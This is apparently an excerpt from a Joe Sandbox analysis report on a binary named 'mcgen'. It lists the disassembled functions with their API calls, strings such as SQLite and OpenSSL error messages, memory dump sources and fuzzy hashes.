Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: e07bbe44bbcd619e33119239165f330ff4d5713537b61c95606d1ff58c628ffb
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 02318CA0E0C27341FA24AF3ED4213B92799AF423A7F444438EB5DC72D7DE2CA445C291

Function 00007FF6B9F201AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F201F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F202E7

Memory Dump Source

Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: 1c19b1c5e198bacb9f7f8c0ebac55ad066965f868dc763c4b3034f1f8a7cbc30
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: E751C663A092C146E6689E6D940077A7299EF46BB6F184635FF6D877C5CF3CD4018601

Function 00007FF6B9F2C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF6B9F2C33D), ref: 00007FF6B9F2C1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF6B9F2C33D), ref: 00007FF6B9F2C1FA

Memory Dump Source

Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: 3fa5782cfb2183db67c02a04b7434ffaaeaabc0e7720b4c91186d2d3ad08411e
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: 9D11C171A18A8181DA208F29A8142697765BB85BF5F544331FF7D8B7E9CE7CD0158700

Function 00007FF6B9F2ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF6B9F2AA45,?,?,00000000,00007FF6B9F2AAFA), ref: 00007FF6B9F2AC36
GetLastError.KERNEL32(?,?,?,00007FF6B9F2AA45,?,?,00000000,00007FF6B9F2AAFA), ref: 00007FF6B9F2AC40

Memory Dump Source

Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 84d3a478d89b2d190fce0a413e4f0ca67f1d0c7232cecda021be7dfd1f122380
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: F2216F21B1C6C242FAA49F699590379368E9F847B6F094239FB2EC73D5CE7CE4458301

Function 00007FF6B9F2B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F2BA32

Memory Dump Source

Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction ID: 67fabbbfb9de933cb546baee5dd33cc0a6eaee0df5fd85bead2c642512795a98
Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
Instruction Fuzzy Hash: 5B316F31E2869285E7515F6D884137C3658AB81BB7F514239FF6D833D2CEBCE4418B11

Function 00007FF6B9F363C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F363E7

Memory Dump Source

Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: a16b878d8f9bc7bad4a9867ae9082fb04db46b2abedc329dc4e18f4e0ccbf167
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: B8216F72A1CA8686DB718F6CD48137976A4EB84BB5F244234EB9DC76D9DF3DD4008B01

Function 00007FF6B9F2042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F20480

Memory Dump Source

Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 7b44969c58d0839089edb9f04bc29d8a04f9cda4c76d102c320c4d10a5f83206
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 4101C422A0878140EA04DF5A9901679B699BF86FF1F2C8631FF5C97BD6CE3CE1018300

Function 00007FFDA334EF30 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?,00007FFDA334EE5D), ref: 00007FFDA334EF61

Memory Dump Source

Source File: 00000002.00000002.2536395323.00007FFDA3341000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDA3340000, based on PE: true

Associated: 00000002.00000002.2536355851.00007FFDA3340000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA3403000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536743912.00007FFDA3407000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffda3340000_mcgen.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
Instruction ID: 0ec08deccdf4ccb3055487328bf3687d18178aa263743b2f944c539a55c21c68
Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
Instruction Fuzzy Hash: 85219232B0CF8187D3549B22A55066AB2A6FB84BC4F544135EB8C13F96CF3DD451CB08

Function 00007FF6B9F2EC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF6B9F2B39A,?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA), ref: 00007FF6B9F2EC5D

Memory Dump Source

Source File: 00000002.00000002.2532433470.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000002.00000002.2532321589.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532486316.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532583185.00007FF6B9F51000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2532795137.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction ID: 19ce7a14e54629dc8b9b3f2c9fd7ab1253ea19c66de66bb27eac62e54ef95a07
Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction Fuzzy Hash: 37F06254B4968781FE595EAD54613B5278E5F84BA2F6C4430EF0DC73D1DD7CE480C211

Non-executed Functions

Function 00007FFD9414D690 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 386COMMON

Download Yara Rule

Strings

lib, xrefs: 00007FFD9414D8E1
_init, xrefs: 00007FFD9414D98E
no entry point [%s] in shared library [%s], xrefs: 00007FFD9414DB2C
sqlite3_extension_init, xrefs: 00007FFD9414D71A
unable to open shared library [%.*s], xrefs: 00007FFD9414DC9F
%s.%s, xrefs: 00007FFD9414D75C
not authorized, xrefs: 00007FFD9414D703
error during initialization: %s, xrefs: 00007FFD9414DA56
sqlite3_, xrefs: 00007FFD9414D893

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID:
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
API String ID: 0-3733955532
Opcode ID: 6eaf877994def99b632411cebe2cf22a19285df91e40d12a58737d9fdeea6513
Instruction ID: d2fefbd18fea31072d92f9bd70494d98a956b17aff910cbbde79e367ec47dbdd
Opcode Fuzzy Hash: 6eaf877994def99b632411cebe2cf22a19285df91e40d12a58737d9fdeea6513
Instruction Fuzzy Hash: 5A027E22B19A8385EE758BA1A4B437963A0BF86F85F08C535DE4E167A6DF3DE504C300

Function 00007FFDA3341497 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 306COMMON

Download Yara Rule

Strings

, xrefs: 00007FFDA33992A3
SHA2-256, xrefs: 00007FFDA33992D7
HMAC, xrefs: 00007FFDA339928B
tls_construct_stoc_cookie, xrefs: 00007FFDA3398F8F, 00007FFDA33991BE, 00007FFDA339934C, 00007FFDA33993C8, 00007FFDA339943D
..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFDA3398F9B, 00007FFDA33991CA, 00007FFDA3399353, 00007FFDA33993D4, 00007FFDA3399444

Memory Dump Source

Source File: 00000002.00000002.2536395323.00007FFDA3341000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDA3340000, based on PE: true

Associated: 00000002.00000002.2536355851.00007FFDA3340000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA33F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536395323.00007FFDA3403000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536743912.00007FFDA3407000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffda3340000_mcgen.jbxd

Similarity

API ID:
String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
API String ID: 0-1087561517
Opcode ID: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
Instruction ID: c20f7b28ce9bf03ec0fc404a809b41f1716e518797d20b148333b43e5cc69960
Opcode Fuzzy Hash: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
Instruction Fuzzy Hash: 7ED11961B0EE4381FA50BF6295713B91293AF85784F844031DD0E6BB87DE3EE5458358

Function 00007FFD94136710 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 338COMMON

Download Yara Rule

APIs

00007FFDAC063010.VCRUNTIME140 ref: 00007FFD941368A2
00007FFDAC063010.VCRUNTIME140 ref: 00007FFD94136B2E

Strings

foreign key on %s should reference only one column of table %T, xrefs: 00007FFD94136795
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFD941367BE
unknown column "%s" in foreign key definition, xrefs: 00007FFD94136ABE

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 4157932375-272990098
Opcode ID: 970d39b844a7ba5ded7514ac1d1b25855ba9e19041e2948509ca3c7fa4e3a15f
Instruction ID: 9cdcdc3f06f098c53c8842277b38f689d0c364792a9e79b2e70b87308d62c790
Opcode Fuzzy Hash: 970d39b844a7ba5ded7514ac1d1b25855ba9e19041e2948509ca3c7fa4e3a15f
Instruction Fuzzy Hash: FAD1D063B09B8586EB388B9594B47B97BA1FB46BC8F448532DE5D13786DE3CE441C300

Function 00007FFD940F5660 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

00007FFDAC063010.VCRUNTIME140 ref: 00007FFD940F5A15
00007FFDAC063010.VCRUNTIME140 ref: 00007FFD940F5A2A

Strings

%s at line %d of [%.10s], xrefs: 00007FFD940F56BD
database corruption, xrefs: 00007FFD940F56B1
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFD940F56A5

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4157932375-3727861699
Opcode ID: 3655e22da9e07da38f3769848262744f944a14fbb408cd692dcf19944dac75b3
Instruction ID: 9530ce9f073c5df44acb387f21f7c95506679119c379713428cff013807d8664
Opcode Fuzzy Hash: 3655e22da9e07da38f3769848262744f944a14fbb408cd692dcf19944dac75b3
Instruction Fuzzy Hash: 62D1BD72B08A8586DB68CF95A0907A9B7A1FF86B84F558032DE4D47B46EF3CD841D740

Function 00007FFD940F8720 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 211COMMON

Download Yara Rule

APIs

00007FFDAC063010.VCRUNTIME140 ref: 00007FFD940F88DC
00007FFDAC063010.VCRUNTIME140 ref: 00007FFD940F89E1

Strings

%s at line %d of [%.10s], xrefs: 00007FFD940F87D6
database corruption, xrefs: 00007FFD940F87CF
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFD940F87BC

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4157932375-3727861699
Opcode ID: 77f1c398e4feca1772d8a54262c444990c89a142e1243c31ede2a848592e574a
Instruction ID: 1fade40746474b626ea6d63e4a5a14428ed103f18b1398758bac4689b7ee5a1d
Opcode Fuzzy Hash: 77f1c398e4feca1772d8a54262c444990c89a142e1243c31ede2a848592e574a
Instruction Fuzzy Hash: FE91DF23B086C186E724CB6692E16BE77A0FB42784F488176DB8E47A86DF3CE455D740

Function 00007FFD94168620 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239COMMON

Download Yara Rule

APIs

00007FFDAC063010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFD94168AEF), ref: 00007FFD941687B9
00007FFDAC063010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFD94168AEF), ref: 00007FFD9416883B
00007FFDAC063010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFD94168AEF), ref: 00007FFD9416892D

Strings

RETURNING may not use "TABLE.*" wildcards, xrefs: 00007FFD941686A1

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: RETURNING may not use "TABLE.*" wildcards
API String ID: 4157932375-2313493979
Opcode ID: f63cdbfc781e1cc30f49cfbae50e1d6ec23c96147ccc90fbb7ff98d4043e38b1
Instruction ID: 889058656443f0a0270fbf169f59382d8bfd5ec91dddcde8ff475bcdeab72064
Opcode Fuzzy Hash: f63cdbfc781e1cc30f49cfbae50e1d6ec23c96147ccc90fbb7ff98d4043e38b1
Instruction Fuzzy Hash: A6B17E23B09B8185E720CF56D4902A967A1FB96BA8F05C336DAAD177D6DF38E195C300

Function 00007FFD9411D460 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

00007FFDAC063010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFD941178D7), ref: 00007FFD9411D5BA
00007FFDAC063010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFD941178D7), ref: 00007FFD9411D5E4
00007FFDAC063010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFD941178D7), ref: 00007FFD9411D637

Strings

H, xrefs: 00007FFD9411D5CE

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID: 00007C063010
String ID: H
API String ID: 4157932375-2852464175
Opcode ID: 94caf086f54589942c1a3f8dca44f9cf8cc577e0f8a3d8302a345ad245eb559f
Instruction ID: 896083c204e208cdcba9e3f96bdd204e210b11a4062fc9933062e6eff6f07e42
Opcode Fuzzy Hash: 94caf086f54589942c1a3f8dca44f9cf8cc577e0f8a3d8302a345ad245eb559f
Instruction Fuzzy Hash: 1091AF67B2865186EB748B55D0A077967A0FB4AB98F148634DE9E17BC6CF3CF450CB00

Function 00007FFD94159470 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 198COMMON

Download Yara Rule

Strings

column%d, xrefs: 00007FFD94159678
%s.%s, xrefs: 00007FFD941595EE
rowid, xrefs: 00007FFD941595CE

Memory Dump Source

Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true

Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd

Similarity

API ID:
String ID: %s.%s$column%d$rowid
API String ID: 0-1505470444
Opcode ID: de587f384be9fed1cc3d352f6a517015bb48ff4a3a33b04db7dd4cf98bea7dec
Instruction ID: 1ce7160a61e2b91586182f2b9dc793be3601535f0b56095c3c13d890f7e642fe
Opcode Fuzzy Hash: de587f384be9fed1cc3d352f6a517015bb48ff4a3a33b04db7dd4cf98bea7dec
Instruction Fuzzy Hash: 54919A32B18B8285EA30CB95D4A43A967A4FB46BA4F448336DABC177D6EF3DD045C701

Function 00007FFD9410C677 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

00007FFDAC063010.VCRUNTIME140 ref: 00007FFD9410C7BD
00007FFDAC063010.VCRUNTIME140 ref: 00007FFD9410C7D6
